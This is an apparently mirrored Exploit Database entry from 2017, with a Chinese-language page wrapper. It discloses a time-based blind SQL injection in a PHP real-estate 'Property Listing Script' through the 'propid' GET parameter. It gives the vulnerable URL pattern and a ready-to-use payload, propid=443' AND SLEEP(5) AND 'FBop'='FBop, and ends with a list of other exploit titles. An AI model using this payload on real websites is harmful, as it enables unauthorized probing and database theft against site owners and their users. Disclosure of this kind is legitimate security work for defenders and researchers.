Property Listing Script – ‘propid’ Blind SQL Injection

Exploit Database
43 阅读

作者： Kaan KAMIS

日期： 2017-02-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41225/

Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.

Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind

Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop

last Exploits
Property Listing Script – ‘propid’ Blind SQL Injection的更多信息

WordPress Plugin Baggage Freight Shipping Australia 0.1.0 – Arbitrary File Upload：
phpFaber CMS 2.0.5 – Multiple Cross-Site Scripting Vulnerabilities：
Netlify CMS 2.10.192 – Stored Cross-Site Scripting (XSS)：
MyIT CRM – Multiple Cross-Site Scripting Vulnerabilities：
Rukovoditel Project Management CRM 2.4.1 – ‘lists_id’ SQL Injection：
Joomla! Component Visites 1.1 RC2 – Remote File Inclusion：
Online Car Rental System 1.0 – Stored Cross Site Scripting：
Capexweb 1.1 – SQL Injection：